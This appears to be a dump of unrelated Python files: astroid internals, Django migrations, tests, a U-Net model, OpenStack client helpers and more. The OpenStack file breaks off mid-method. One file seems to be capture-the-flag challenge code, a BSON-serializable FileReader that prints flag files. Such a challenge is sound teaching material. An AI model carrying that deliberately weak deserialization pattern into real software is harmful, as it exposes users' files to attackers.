and ClassDef nodes, including a dict like interface for direct access
to locals information
"""
# attributes below are set by the builder module or by raw factories
locals: Dict[str, List["nodes.NodeNG"]] = {}
"""A map of the name of a local variable to the node defining the local."""
def qname(self):
"""Get the 'qualified' name of the node.
For example: module.name, module.class.name ...
:returns: The qualified name.
:rtype: str
"""
# pylint: disable=no-member; github.com/pycqa/astroid/issues/278
if self.parent is None:
return self.name
return f"{self.parent.frame(future=True).qname()}.{self.name}"
def scope(self: _T) -> _T:
"""The first parent node defining a new scope.
:returns: The first parent scope node.
:rtype: Module or FunctionDef or ClassDef or Lambda or GenExpr
"""
return self
def _scope_lookup(self, node, name, offset=0):
"""XXX method for interfacing the scope lookup"""
try:
stmts = _filter_stmts(node, self.locals[name], self, offset)
except KeyError:
stmts = ()
if stmts:
return self, stmts
# Handle nested scopes: since class names do not extend to nested
# scopes (e.g., methods), we find the next enclosing non-class scope
pscope = self.parent and self.parent.scope()
while pscope is not None:
if not isinstance(pscope, scoped_nodes.ClassDef):
return pscope.scope_lookup(node, name)
pscope = pscope.parent and pscope.parent.scope()
# self is at the top level of a module, or is enclosed only by ClassDefs
return builtin_lookup(name)
def set_local(self, name, stmt):
"""Define that the given name is declared in the given statement node.
.. seealso:: :meth:`scope`
:param name: The name that is being defined.
:type name: str
:param stmt: The statement that defines the given name.
:type stmt: NodeNG
"""
# assert not stmt in self.locals.get(name, ()), (self, stmt)
self.locals.setdefault(name, []).append(stmt)
__setitem__ = set_local
def _append_node(self, child):
"""append a child, linking it in the tree"""
# pylint: disable=no-member; depending by the class
# which uses the current class as a mixin or base class.
# It's rewritten in 2.0, so it makes no sense for now
# to spend development time on it.
self.body.append(child)
child.parent = self
def add_local_node(self, child_node, name=None):
"""Append a child that should alter the locals of this scope node.
:param child_node: The child node that will alter locals.
:type child_node: NodeNG
:param name: The name of the local that will be altered by
the given child node.
:type name: str or None
"""
if name != "__class__":
# add __class__ node as a child will cause infinite recursion later!
self._append_node(child_node)
self.set_local(name or child_node.name, child_node)
def __getitem__(self, item):
"""The first node the defines the given local.
:param item: The name of the locally defined object.
:type item: str
:raises KeyError: If the name is not defined.
"""
return self.locals[item][0]
def __iter__(self):
"""Iterate over the names of locals defined in this scoped node.
:returns: The names of the defined locals.
:rtype: iterable(str)
"""
return iter(self.keys())
def keys(self):
"""The names of locals defined in this scoped node.
:returns: The names of the defined locals.
:rtype: list(str)
"""
return list(self.locals.keys())
def values(self):
"""The nodes that define the locals in this scoped node.
:returns: The nodes that define locals.
:rtype: list(NodeNG)
"""
# pylint: disable=consider-using-dict-items
        # It looks like this class overrides items/keys/values;
        # probably not worth the headache
return [self[key] for key in self.keys()]
def items(self):
"""Get the names of the locals and the node that defines the local.
:returns: The names of locals and their associated node.
:rtype: list(tuple(str, NodeNG))
"""
return list(zip(self.keys(), self.values()))
def __contains__(self, name):
"""Check if a local is defined in this scope.
:param name: The name of the local to check for.
:type name: str
:returns: True if this node has a local of the given name,
False otherwise.
:rtype: bool
"""
return name in self.locals
class ComprehensionScope(LocalsDictNodeNG):
"""Scoping for different types of comprehensions."""
scope_lookup = LocalsDictNodeNG._scope_lookup
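# Hedged illustration (not part of astroid itself): qname() concatenates the names
# of the enclosing frames, so a method parsed from source yields a dotted path.
#   import astroid
#   node = astroid.extract_node('''
#   class A:
#       def meth(self):  #@
#           pass
#   ''')
#   node.qname()   # e.g. '.A.meth' when the synthetic module has no name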
|
python
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-07-14 12:19
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Capability',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('actuator', models.CharField(max_length=200)),
('action', models.CharField(max_length=50)),
('remote_id', models.IntegerField()),
('remote_name', models.CharField(max_length=200)),
('active', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='CybOXType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('identifier', models.CharField(max_length=50)),
('template', models.TextField(default='{}', max_length=1000)),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('raw_message', models.TextField(max_length=5000)),
('created_at', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('sent_at', models.DateTimeField(blank=True, null=True)),
('upstream_respond_to', models.CharField(max_length=5000, null=True)),
('upstream_command_ref', models.CharField(max_length=100, null=True)),
('capability', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Capability')),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='JobStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(max_length=40)),
],
),
migrations.CreateModel(
name='Relay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('url', models.CharField(max_length=400)),
('username', models.CharField(blank=True, max_length=200, null=True)),
('password', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='Response',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('raw_message', models.CharField(max_length=5000)),
('created_at', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Job')),
],
),
migrations.CreateModel(
name='Target',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=140)),
('raw_message', models.TextField(max_length=500)),
('cybox_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.CybOXType')),
],
),
migrations.AddField(
model_name='job',
name='status',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.JobStatus'),
),
migrations.AddField(
model_name='job',
name='target',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Target'),
),
migrations.AddField(
model_name='capability',
name='requires',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.CybOXType'),
),
migrations.AddField(
model_name='capability',
name='via',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reactor_master.Relay'),
),
]
|
python
|
>>> 3
3
>>> _*_, _**0.5
(9, 1.7320508075688772)
>>>
|
python
|
import bson
import os, base64, zlib, random
from bson import BSONCoding, import_class
class Member(BSONCoding):
def __init__(self, username = "", code = "00", password = ""):
self.username = username
self.code = code
self.password = password
def __str__(self):
display = "Username : \nCode : \nPassword : "
if isinstance(self.username, basestring) and isinstance(self.code, basestring) and isinstance(self.password, basestring):
display = "Username : " + str(self.username) + "\nCode : " + str(self.code) + "\nPassword : " + str(self.password)
return display
def bson_encode(self):
return {"username": self.username, "code": self.code, "password": self.password}
def bson_init(self, raw_values):
self.username = raw_values["username"]
self.code = raw_values["code"]
self.password = raw_values["password"]
def __eq__(self, other):
if not isinstance(other, Member):
return NotImplemented
        if self.username != other.username:
return False
if self.code != other.code:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
class FileReader(BSONCoding):
def __init__(self, file_name):
self.filename = file_name
self._id = random.randint(0, 2000)
def __str__(self):
if isinstance(self.filename, basestring) and (self.filename.__eq__('oold_flag.py') or self.filename.__eq__('new_flag.py')):
fh = open('utils/'+self.filename,'r')
display = "File Id: " + str(self._id) + \
"\n==========================================\n" + \
fh.read()
fh.close()
return display
else:
return "File Id: " + str(self._id) + \
"\n==========================================\n"
def bson_encode(self):
return {"filename": self.filename, "_id": self._id}
def bson_init(self, raw_values):
self.filename = raw_values["filename"]
self._id = raw_values["_id"]
def __eq__(self, other):
if not isinstance(other, FileReader):
return NotImplemented
if self.filename != other.filename:
return False
if self._id != other._id:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
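# Minimal round-trip sketch for Member (illustration only): it exercises just
# the bson_encode/bson_init hooks defined above, not the wire-level BSON API.
def _member_roundtrip_demo():
    original = Member(username="alice", code="42", password="secret")
    raw = original.bson_encode()   # plain dict produced by the hook above
    restored = Member()
    restored.bson_init(raw)        # rebuild a Member from that dict
    assert restored.username == original.username
    assert restored.code == original.code
    assert restored.password == original.password
    return restored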
# import serpy, json, os
# import random, pickle, base64
# class Member(object):
# username = ""
# code = 0
# password = ""
# def __init__(self, username = "", code = 0, password = ""):
# self.username = username
# self.code = code
# self.password = password
# def __str__(self):
# display = "Username : " + self.username + "\nCode : " + str(self.code) + "\nPassword : " + self.password
# return display
# class FileReader(object):
# _id = 0
# filename = ""
# def __init__(self, file_name):
# self.filename = file_name
# self._id = random.randint(0, 2000)
# def __str__(self):
# if self.filename in ["utils/oold_flag.py", "utils/new_flag.py"]:
# return "File Id: " + str(self._id) + "\n==========================================\n" + open(self.filename).read()
# else:
# return "File Id: " + str(self._id) + "\n==========================================\n"
# class FileReaderSerializer(serpy.Serializer):
# Id = serpy.Field(attr="_id")
# filename = serpy.Field(attr="filename")
# file = serpy.MethodField()
# def get_file(self, obj):
# return obj.__str__()
# class MemberSerializer(serpy.Serializer):
# username = serpy.Field(attr='username')
# code = serpy.Field(attr='code')
# password = serpy.Field(attr='password')
# member = serpy.MethodField()
# def get_member(self, obj):
# return obj.__str__()
|
python
|
# library/package semantic version
__api_version__ = '1.4'
__generation__ = 1
|
python
|
from math import (
sin,
cos,
tan,
acos,
radians,
degrees,
)
from datetime import (
timedelta,
)
def earth_declination(n):
return 23.45 * sin(radians(360/365 * (284+n)))
def td(lat):
dec = earth_declination(119) #TODO Change this literal
cofactor = -(tan(radians(lat)) * tan(radians(dec)))
return 2/15 * degrees(acos(cofactor))
def longitude_correction(lng, fuse):
diff = lng - fuse
return timedelta(
minutes=(diff * 60) / 15
)
def day_range(td, lng, fuse):
td /= 2
sunrise = timedelta(hours=12-td)
sunset = timedelta(hours=12+td)
correction = longitude_correction(lng, fuse)
sunrise += correction
sunset += correction
return (sunrise, sunset)
lat = -23.543333
lng = 46.633056
fuse = 45
td = td(lat)
sunrise, sunset = day_range(td, lng, fuse)
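# Quick sanity check (illustration only, not part of the original script):
# format the computed timedeltas as HH:MM clock times for the coordinates
# hard-coded above.
def _as_clock(delta):
    total_minutes = int(delta.total_seconds() // 60)
    return "{:02d}:{:02d}".format(total_minutes // 60, total_minutes % 60)

print("sunrise ~ {}".format(_as_clock(sunrise)))
print("sunset  ~ {}".format(_as_clock(sunset)))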
|
python
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test app."""
from __future__ import absolute_import
import pytest
from flask import Flask
from invenio_oaiserver import InvenioOAIServer
def test_version():
"""Test version import."""
from invenio_oaiserver import __version__
assert __version__
def test_init():
"""Test extension initialization."""
app = Flask('testapp')
with pytest.warns(None):
InvenioOAIServer(app)
|
python
|
'''
Tests for the lookup module.
'''
import sys
import unittest
from io import StringIO
from unittest.mock import patch
sys.path.insert(0, "0_1_0/")  # extend the path before importing project modules
from modules import rec_lookup
class TestLookup(unittest.TestCase):
    '''Lookup Tests'''
def setUp(self):
self.nodes_json = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0011223344556677",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.nodes_alternative_json = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0000000000000000",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.nodes_empty_json = StringIO('')
def test_count_matching_mac(self):
'''
        Confirms matching MAC addresses are counted correctly.
'''
count_result = rec_lookup.count_matching_mac("12345678")
self.assertEqual(count_result, 0)
self.assertEqual(
rec_lookup.count_matching_mac("0011223344556677"),
0
)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_json
count_result = rec_lookup.count_matching_mac("0011223344556677")
mock_open.assert_called()
self.assertEqual(count_result, 1)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_alternative_json
count_result = rec_lookup.count_matching_mac("0011223344556677")
mock_open.assert_called()
self.assertEqual(count_result, 0)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_empty_json
self.assertEqual(
rec_lookup.count_matching_mac("0011223344556677"),
0
)
mock_open.assert_called()
class TestLookUpAccessRequest(unittest.TestCase): # pylint: disable=R0904
'''Access Request Tests'''
def setUp(self):
'''
Collection of JSON used for testing.
'''
self.system_json = StringIO(
'''{
"serial": "536780dfe639468e8e23fc568006950d",
"timezone": "America/New_York",
"CurrentVersion": "0_0_0",
"HUBid": 40,
"Token": "5a12ff36eed2f0647a48af62e635eb8cfd4c5979",
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032"
}'''
)
self.nodes_json = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0011223344556677",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.members_json = StringIO(
'''[
{
"cardNumber": "313233343536373839",
"access_group": 123,
"phone_number": "1234567890",
"address": "1331 12th ave",
"city": "Altoona",
"state": "PA",
"zip_code": "16601",
"username": "BestName",
"first_name": "John",
"last_name": "Doe",
"email": "[email protected]",
"restricted_nodes": [0,9,8]
}
]'''
)
self.owners_json = StringIO(
'''[
{
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"cardNumber": "30393837363534333231",
"phone_number": null,
"address": null,
"city": null,
"state": null,
"zip_code": null,
"username": "OwnerUserName",
"first_name": "Jim",
"last_name": "John",
"email": "[email protected]"
}
]'''
)
self.permissions_json = StringIO(
'''[
{
"id": 1,
"name": "General Access",
"startTime": "20:20:20",
"endTime": "23:23:23",
"monday": true,
"tuesday": true,
"wednesday": true,
"thursday": true,
"friday": true,
"saturday": true,
"sunday": true,
"twenty_four_seven": false,
"default_fallback": true,
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"allowedNodes": [1, 4, 6]
}
]'''
)
# ----------------------------------- _alt ----------------------------------- #
        self.system_json_alt = StringIO(
'''{
"serial": "536780dfe639468e8e23fc568006950d",
"timezone": "America/New_York",
"CurrentVersion": "0_0_0",
"HUBid": 40,
"Token": "5a12ff36eed2f0647a48af62e635eb8cfd4c5979",
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032"
}'''
)
self.nodes_json_alt = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0011223344556677",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.members_json_alt = StringIO(
'''[
{
"cardNumber": "313233343536373839",
"access_group": 123,
"phone_number": "1234567890",
"address": "1331 12th ave",
"city": "Altoona",
"state": "PA",
"zip_code": "16601",
"username": "BestName",
"first_name": "John",
"last_name": "Doe",
"email": "[email protected]",
"restricted_nodes": [0,9,8]
}
]'''
)
self.owners_json_alt = StringIO(
'''[
{
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"cardNumber": "30393837363534333231",
"phone_number": null,
"address": null,
"city": null,
"state": null,
"zip_code": null,
"username": "OwnerUserName",
"first_name": "Jim",
"last_name": "John",
"email": "[email protected]"
}
]'''
)
self.permissions_json_alt = StringIO(
'''[
{
"id": 1,
"name": "General Access",
"startTime": "20:20:20",
"endTime": "23:23:23",
"monday": true,
"tuesday": true,
"wednesday": true,
"thursday": true,
"friday": true,
"saturday": true,
"sunday": true,
"twenty_four_seven": false,
"default_fallback": true,
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"allowedNodes": [1, 4, 6]
}
]'''
)
def test_files_opened(self):
'''
Confirms that all the files are correctly opened and read.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.side_effect = [
self.system_json,
self.nodes_json, # Opened from conversion function.
self.owners_json, # Opened from owner check function.
self.members_json, # Opened from get_details function.
self.permissions_json, # Opened from get_group_details function.
]
self.assertAlmostEqual(rec_lookup.access_request(313131, '0011223344556677'), 2)
mock_open.assert_called()
def test_mac_to_id(self):
'''
Confirms that the mac address is converted to the node id.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_json
node_id = rec_lookup.mac_to_id('0011223344556677')
mock_open.assert_called()
self.assertEqual(node_id, 1)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_json_alt
node_id = rec_lookup.mac_to_id('9911223344556677')
mock_open.assert_called()
self.assertEqual(node_id, '9911223344556677')
def test_is_owner(self):
'''
Confirms that the owner check function returns the correct value.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.owners_json
owner = rec_lookup.is_owner('30393837363534333231')
mock_open.assert_called()
self.assertTrue(owner)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.owners_json_alt
owner = rec_lookup.is_owner('99393837363534333231')
mock_open.assert_called()
self.assertFalse(owner)
def test_get_details(self):
'''
Verifies that the correct details are returned.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.members_json
user = rec_lookup.get_details('313233343536373839')
mock_open.assert_called()
self.assertTrue(user['found'])
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.members_json_alt
user = rec_lookup.get_details('993233343536373839')
mock_open.assert_called()
self.assertFalse(user['found'])
def test_get_group_details(self):
'''
Verifies that the correct details are returned.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.permissions_json
group = rec_lookup.get_group_details(1)
mock_open.assert_called()
self.assertTrue(group['found'])
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.permissions_json_alt
group = rec_lookup.get_group_details(69)
mock_open.assert_called()
self.assertFalse(group['found'])
def test_access_request_combinations(self):
'''
Checks that the access request function returns the correct values.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.side_effect = [
self.system_json,
self.nodes_json, # Opened from conversion function.
self.owners_json, # Opened from owner check function.
self.members_json, # Opened from get_details function.
self.permissions_json, # Opened from get_group_details function.
]
self.assertEqual(
rec_lookup.access_request(313131, '0011223344556677'),
2
)
mock_open.assert_called()
if __name__ == '__main__':
unittest.main()
|
python
|
# author: Artan Zandian
# date: 2022-02-18
import tensorflow as tf
from tensorflow.keras.layers import (
Input,
Conv2D,
MaxPooling2D,
Dropout,
Conv2DTranspose,
concatenate,
)
def encoder_block(inputs=None, n_filters=32, dropout=0, max_pooling=True):
"""
Convolutional encoder block
Parameters
----------
inputs: tensor
Input tensor
n_filters: int
Number of convolutional layer channels
dropout: float
Dropout probability between 0 and 1
max_pooling: bool
Whether to MaxPooling2D for spatial dimensions reduction
Returns
-------
next_layer, skip_connection
Next layer for the downsampling section and skip connection outputs
"""
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(inputs)
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(conv)
# Add dropout if existing
if dropout > 0:
conv = Dropout(dropout)(conv)
# Add MaxPooling2D with 2x2 pool_size
if max_pooling:
next_layer = MaxPooling2D(pool_size=(2, 2))(conv)
else:
next_layer = conv
skip_connection = conv # excluding maxpool from skip connection
return next_layer, skip_connection
def decoder_block(expansive_input, contractive_input, n_filters=32):
"""
Convolutional decoder block
Parameters
----------
expansive_input: tensor
Input tensor
contractive_input: tensor
Input tensor from matching encoder skip layer
n_filters: int
Number of convolutional layers' channels
Returns
-------
conv
Tensor of output layer
"""
up = Conv2DTranspose(
filters=n_filters, kernel_size=(3, 3), strides=2, padding="same"
)(expansive_input)
# Merge the previous output and the contractive_input
# The order of concatenation for channels doesn't matter
merge = concatenate([up, contractive_input], axis=3)
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(merge)
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(conv)
return conv
def U_Net(input_size=(320, 320, 3), n_filters=32, n_classes=1):
"""
U_Net model
Parameters
----------
input_size: tuple of integers
Input image dimension
n_filters: int
Number of convolutional layer channels
n_classes: int
Number of output classes
Returns
-------
model
tensorflow model
"""
inputs = Input(input_size)
# Encoder section
# ================
# Double the number of filters at each new step
# The first element of encoder_block is input to the next layer
eblock1 = encoder_block(inputs, n_filters)
eblock2 = encoder_block(eblock1[0], n_filters * 2)
eblock3 = encoder_block(eblock2[0], n_filters * 4)
eblock4 = encoder_block(eblock3[0], n_filters * 8, dropout=0.3)
eblock5 = encoder_block(eblock4[0], n_filters * 16, dropout=0.3, max_pooling=False)
# Decoder section
# ================
# Chain the output of the previous block as expansive_input and the corresponding contractive block output
# The second element of encoder_block is input to the skip connection
# Halving the number of filters of the previous block in each section
dblock6 = decoder_block(
expansive_input=eblock5[1],
contractive_input=eblock4[1],
n_filters=n_filters * 8,
)
dblock7 = decoder_block(
expansive_input=dblock6, contractive_input=eblock3[1], n_filters=n_filters * 4
)
dblock8 = decoder_block(
expansive_input=dblock7, contractive_input=eblock2[1], n_filters=n_filters * 2
)
dblock9 = decoder_block(
expansive_input=dblock8, contractive_input=eblock1[1], n_filters=n_filters
)
conv9 = Conv2D(
n_filters, 3, activation="relu", padding="same", kernel_initializer="he_normal"
)(dblock9)
# Add a 1x1 Conv2D (projection) layer with n_classes filters to adjust number of output channels
conv10 = Conv2D(filters=n_classes, kernel_size=1, padding="same")(conv9)
model = tf.keras.Model(inputs=inputs, outputs=conv10)
return model
if __name__ == "__main__":
model = U_Net((320, 320, 3), n_filters=32, n_classes=1)
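    # A minimal follow-up sketch (not in the original script): compile the
    # model for binary segmentation. Optimizer/loss/metrics are illustrative
    # choices; BinaryCrossentropy(from_logits=True) matches the final Conv2D
    # having no activation.
    model.compile(
        optimizer="adam",
        loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
        metrics=["accuracy"],
    )
    model.summary()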
|
python
|
##parameters=add='', edit='', preview=''
##
from Products.PythonScripts.standard import structured_text
from Products.CMFCore.utils import getUtilityByInterfaceName
from Products.CMFDefault.utils import decode
from Products.CMFDefault.utils import html_marshal
from Products.CMFDefault.utils import Message as _
atool = getUtilityByInterfaceName('Products.CMFCore.interfaces.IActionsTool')
form = context.REQUEST.form
is_preview = False
if add and \
context.validateHTML(**form) and \
context.discussion_reply(**form):
return
elif preview and \
context.validateHTML(**form):
is_preview = True
options = {}
title = form.get('title', context.Title())
text = form.get('text', '')
options['is_preview'] = is_preview
options['title'] = title
options['text'] = text
options['cooked_text'] = structured_text(text)
if is_preview:
hidden_vars = [ {'name': n, 'value': v}
for n, v in html_marshal(title=title, text=text) ]
else:
hidden_vars = []
buttons = []
target = atool.getActionInfo('object/reply', context)['url']
buttons.append( {'name': 'add', 'value': _(u'Add')} )
if is_preview:
buttons.append( {'name': 'edit', 'value': _(u'Edit')} )
else:
buttons.append( {'name': 'preview', 'value': _(u'Preview')} )
options['form'] = { 'action': target,
'listHiddenVarInfos': tuple(hidden_vars),
'listButtonInfos': tuple(buttons) }
return context.discussion_reply_template(**decode(options, script))
|
python
|
import pytest
from django.urls import reverse
from google.auth.exceptions import GoogleAuthError
from crm.factories import UserSocialAuthFactory, ProjectMessageFactory
from crm.models import ProjectMessage
@pytest.mark.django_db
def test_project_message_index(admin_app,
project_message,
project_message_factory):
project_message_factory.create()
url = reverse('crm_projectmessage_modeladmin_index')
admin_app.get(url)
@pytest.mark.django_db
def test_project_message_index_google_auth_error(admin_app,
mocker):
mocker.patch('crm.gmail_utils.sync', side_effect=GoogleAuthError)
url = reverse('crm_projectmessage_modeladmin_index')
r = admin_app.get(url)
assert len(r.context['messages']) == 1
    assert "Can't update messages" in r.text
@pytest.mark.django_db
def test_project_message_index_creates_message(default_site, gmail_service, admin_app, admin_user):
UserSocialAuthFactory(user=admin_user)
assert ProjectMessage.objects.count() == 0
url = reverse('crm_projectmessage_modeladmin_index')
admin_app.get(url)
assert ProjectMessage.objects.count() == 1
@pytest.mark.django_db
def test_project_message_inspect(admin_app,
project_message):
url = reverse('crm_projectmessage_modeladmin_inspect', kwargs={'instance_pk': project_message.pk})
admin_app.get(url)
@pytest.mark.django_db
def test_project_message_inspect_no_project(admin_app):
# https://sentry.io/share/issue/5ca8418a573d4ab59df0e1e5c34a1953/
project_message = ProjectMessageFactory(project=None)
url = reverse('crm_projectmessage_modeladmin_inspect', kwargs={'instance_pk': project_message.pk})
admin_app.get(url)
|
python
|
"""
Copyright 2015 INTEL RESEARCH AND INNOVATION IRELAND LIMITED
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import random
import heatclient.client as heatc
import keystoneclient.v2_0.client as keyc
import novaclient.client as novac
import adaptationengine_framework.configuration as cfg
LOGGER = logging.getLogger('syslog')
class OpenStackClients:
"""
Interfaces to the Openstack keystone, nova, and heat APIs
"""
@staticmethod
def get_keystone_client(
auth_url=None,
username=None,
password=None,
tenant_name=None
):
"""Generate a keystone client"""
LOGGER.debug("Generating keystone client")
os_url = auth_url or cfg.openstack__auth_url
os_user = username or cfg.openstack__username
os_pass = password or cfg.openstack__password
os_tenant = tenant_name or cfg.openstack__tenant
keystone_client = keyc.Client(
auth_url=os_url,
username=os_user,
password=os_pass,
tenant_name=os_tenant
)
LOGGER.debug("Generated keystone client")
return keystone_client
@staticmethod
def get_nova_client(
api_version='2',
username=None,
password=None,
tenant=None,
auth_url=None,
timeout=60
):
"""Generate a nova client"""
LOGGER.debug("Generating nova client")
os_url = auth_url or cfg.openstack__auth_url
os_user = username or cfg.openstack__username
os_pass = password or cfg.openstack__password
os_tenant = tenant or cfg.openstack__tenant
nova_client = novac.Client(
api_version,
os_user,
os_pass,
os_tenant,
os_url,
timeout=timeout,
)
LOGGER.debug("Generated nova client")
return nova_client
@staticmethod
def get_heat_client(keystone_client, admin_ks_client=None):
"""Generate a heat client"""
LOGGER.debug("Looking for heat endpoint")
endpoint_ks_client = admin_ks_client or keystone_client
heat_endpoint = OpenStackClients._find_endpoint(
endpoint_ks_client, 'heat', keystone_client.project_id
)
LOGGER.debug("Generating heat client")
heat_client = heatc.Client(
"1", # HEAT_API_VERSION
endpoint=heat_endpoint,
token=keystone_client.auth_token
)
LOGGER.debug("Generated heat client")
return heat_client
@staticmethod
def _find_endpoint(keystone_client, wanted_service, tenant_id=None):
"""Return the endpoint url for a named openstack service"""
if keystone_client is None:
LOGGER.error("Invalid keystone client")
return None
LOGGER.debug(
"Looking for endpoint for service [{}]".format(wanted_service)
)
endpoint = None
service_id = None
for ks_service in keystone_client.services.list():
LOGGER.debug(
"wanted:{}, name:{}, id:{}".format(
wanted_service, ks_service.name, ks_service.id
)
)
if ks_service.name == wanted_service:
service_id = ks_service.id
break
for ks_endpoint in keystone_client.endpoints.list():
LOGGER.debug(
"service_id:{}, endpoint.service_id:{}, "
"endpoint.internalurl:{}".format(
service_id, ks_endpoint.service_id, ks_endpoint.internalurl
)
)
if ks_endpoint.service_id == service_id:
endpoint = ks_endpoint.internalurl
break
LOGGER.debug("Apparent endpoint url [{}]".format(endpoint))
# openstack undocumented version difference #37891
try:
replacement_id = tenant_id or keystone_client.project_id
endpoint = endpoint.replace(
'%(tenant_id)s',
replacement_id
)
endpoint = endpoint.replace(
'$(tenant_id)s',
replacement_id
)
except AttributeError:
LOGGER.error(
"No endpoint found for service [{}] in Keystone".format(
wanted_service
)
)
LOGGER.debug(
"Endpoint url with tenant id [{}]".format(endpoint)
)
return endpoint
@staticmethod
def get_heat_client_for_stack(admin_keystone_client, stack_id):
"""
        Generate a Heat client with permissions to affect a particular stack.
Heat doesn't let you look at stacks for other tenants,
so we need to keep trying tenants till we find the one who
owns the stack and return a heat client that will have access.
This all assumes that the keystone user is an admin with access
to give auth tokens for every tenant
"""
for tenant in admin_keystone_client.tenants.list():
try:
ks_tenant_client = OpenStackClients.get_keystone_client(
tenant_name=tenant.name
)
heat_client = OpenStackClients.get_heat_client(
ks_tenant_client,
admin_ks_client=admin_keystone_client
)
try:
heat_client.stacks.get(stack_id)
LOGGER.debug("Returning heat client")
return heat_client
                except Exception:
LOGGER.debug(
"Stack doesn't belong to tenant {} anyway".format(
tenant.name
)
)
            except Exception as err:
LOGGER.error("Exception accessing stacks: {}".format(err))
return None
@staticmethod
def get_openstack_clients():
"""Return keystone, heat, and nova clients"""
keystone_client = OpenStackClients.get_keystone_client()
heat_client = OpenStackClients.get_heat_client(keystone_client)
nova_client = OpenStackClients.get_nova_client()
return (keystone_client, nova_client, heat_client)
class OpenStackInterface:
"""An interface to perform some needed Openstack operations"""
def __init__(self):
"""Generate a nova client for the interface"""
LOGGER.debug("OpenStackInterface init")
self._nova_client = OpenStackClients.get_nova_client()
def get_migration_destination(self, vm_id):
"""get a random host id to move this vm to,
so long as it's not the one it's already on
"""
